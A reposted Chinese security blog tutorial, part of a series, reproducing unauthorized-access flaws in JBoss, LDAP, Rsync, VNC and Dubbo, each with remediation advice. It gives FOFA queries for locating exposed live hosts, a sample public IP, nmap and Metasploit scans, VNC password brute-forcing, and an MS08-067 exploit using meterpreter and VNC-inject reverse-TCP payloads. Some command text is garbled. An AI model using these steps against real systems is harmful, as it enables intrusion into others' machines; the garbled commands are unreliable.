0


三十种未授权访问漏洞复现 合集( 四 )

未授权访问漏洞介绍

** 未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。---->目录遍历
目前主要存在未授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTPGitLab, Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
未授权访问漏洞的复现思路:
1.使用靶场进行漏洞复现:(1)vulhub(2)本地搭建靶场
2.使用漏洞扫描工具进行扫描(1)github-功能受限(2)Python-定制化的完成漏洞扫描的利用**

十六:JBoss未授权访问漏洞

》》》漏洞简介《《《

    JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。,默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

》》》漏洞复现《《《

fofa搜索语句:title="'Welcome to JBoss"

拼接以下路径且无需认证直接进入控制页面..

#拼接路径
http://ip:port/jmx-console/

#eg
http://177.67.128.116//jmx-console/

》》》漏洞修复建议《《《

1.jboss.deployment部署shell

2.进行JMX Console 安全配置。

十七:Ldap未授权访问漏洞

》》》漏洞简介《《《

LDAP中文全称为:轻型目录访问协议(Lightweight DirectoryAccess Protocol),默认使用389, LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证,导致未授权访问。

》》》漏洞复现《《《

使用以下Fofa语法搜索使用Idap服务的产品.…..并通过Ldapadmin可视化工具做连接验证..

#fofa语法
port="389"

#Ldapadmin工具

http://www.ldapadmin.org/download/index.html

https://sourceforge.net/projects/ldapadmin/

启动工具并测试存在未授权的LDAP服务..成功如下.

》》》漏洞修复建议《《《

1.修改ldap的acl,不允许匿名访问。
2.根据业务设置ldap访问白名单或黑名单

十八:Rsync未授权访问漏洞

》》》漏洞简介《《《

Rsync未授权访问带来的危害主要有两个
1.造成了严重的信息泄露;
2.上传脚本后门文件,远程命令执行;

Rsync 是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync的默认端口为837 且默认配置文件路径在/etc/rsync.conf

# 配置文件
motd file -> motd文件位置
log file -> 日志文件位置文件位置
path-> 默认路径位置路径位置
use chroot->是否限定在该目录下定在该目录下该目录下,如果为true就限定为模块默认目录
read only->只读配置
list=true ->是否可以列出模块名以列出模块名出模块名
uid =root -> 传输使用的用户名
gid =root-> 传输使用的用户组
auth users ->认证用户名secrets file=/etc/rsyncd.passwd ->指定密码文件密码文件,密码文件/etc/rsyncd.passwd的内容格式为:username:password

hosts allow=192.168.0.101 ->设置可以允许访问的主机

hosts deny 禁止的主机*表任意任意

# 基本命令
Rsync I-avrlptgoDl I-e sshlJuser@hostIP:/dirl [/local/path]
-v 观察模式,输出更多资讯
-9与 -v 相反,仅显示错误信息
递归复制,针对目录-r
仅更新较新的文件-U
复制连接的属性
复制时保持属性不变
保存原有群组
保存原有拥有人
保存原有装置属性
保存原有时间属性
-J忽略更新时间属性,本档案比对较快
-z 加上压缩参数
-e 使用协议通道,例如ssh,-essh
-a 相对于-rlptgoD,所以-a最常用

》》》漏洞复现《《《

fofa语法:(port="873")&&(is_honeypot=false && is_fraud=false)

可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测..

#nmap命令
nmap -p873--script rsync-list-modules ipaddress

Metasploit模块

auxiliary/scanner/rsync/modules list

》》》漏洞修复建议《《《

  1. 隐藏掉 module 信息:修改配置文件 list =false。
  2. 权限控制:不需要写入权限的 module 的设置为只读 Read only = true;
  3. 网络访问控制:使用安全组策略或白名单限制,只允许必要访问的主机访问;
  4. 账户认证:只允许指定的用户利用指定的密码使用 rsync 服务;
  5. 数据加密传输:Rsync 默认没有直接支持加密传输,如果需要 Rsync 同步重要性很高的数据,可以使用 ssh;

十九:VNC未授权访问漏洞

》》》漏洞简介《《《

VNC 是虚拟网络控制台 Virtual Network Console 的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制target主机。

》》》漏洞复现《《《

fofa语句:(port="5900")&&(is_honeypot=false && is_fraud=false)

可通过MSF中的模块进行检测与漏洞利用.

# VNC未授权检测
msf6>use auxiliary/scanner/vnc/vnc_none_auth

msf6 auxiliary(scanner/vnc/vnc_none_auth)>show options

msf6 auxiliary(scanner/vnc/vnc_none_auth)>set rhosts 192.168.168.200-254

msf6 auxiliary(scanner/vnc/vnc_none_auth)>set threads 100

msf6 auxiliary(scanner/vnc/vnc_none_auth)>run

# VNC密码爆破
msf6>use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login)>192.168.168.228

msf6 auxiliary(scanner/vnc/vnc_login)>set rhosts 192.168.168.228

msf6 auxiliary(scanner/vnc/vnc_login)>set blank_passwords true //弱密码爆破
msf6 auxiliary(scanner/vnc/vnc_login)>run

# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi)>use exploit/windows/smb/ms08_067 netapi
msf6 exploit(windows/smb/ms08_067_netapi)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi)>set rhosts 192.168.168.228

msf6 exploit(windows/smb/ms08_067_netapi)>set lhost 192.168.168.102

msf6 exploit(windows/smb/ms08_067_netapi)>set target 34

msf6 exploit(windows/smb/ms08_067_netapi)>exploit

获取会话后,直接run vnc可控制远程虚拟机

# 直接控制远程机器
msf6>use exploit/multi/handler
msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp

msf6 exploit(multi/handler)>set lhost 192.168.168.102
msf6 exploit(multi/handler)>set lport 4466
msf6 exploit(multi/handler)>exploit

VNC链接验证...

vncviewer ipaddress

》》》漏洞修复建议《《《

  1. 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。
  2. 以最小普通权限身份运行操作系统。

二十:Dubbo未授权访问漏洞

》》》漏洞简介《《《

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。

》》》漏洞复现《《《

fofa语句:(app="APACHE-dubbo")&&(is_honeypot=false && is_fraud=false)

使用Telnet程序直接进行链接测试…

telent IP port

》》》漏洞修复建议《《《

1.配置dubbo认证。
2.设置防火墙策略;
如果正常业务中dubbo 服务需要被其他服务器来访问,可以通过 iptables 策略,仅允许指定的 IP 来访问服务。


本文转载自: https://blog.csdn.net/qq_48368964/article/details/140908482
版权归原作者 A 八方 所有, 如有侵权,请联系我们删除。

“三十种未授权访问漏洞复现 合集( 四 )”的评论:

还没有评论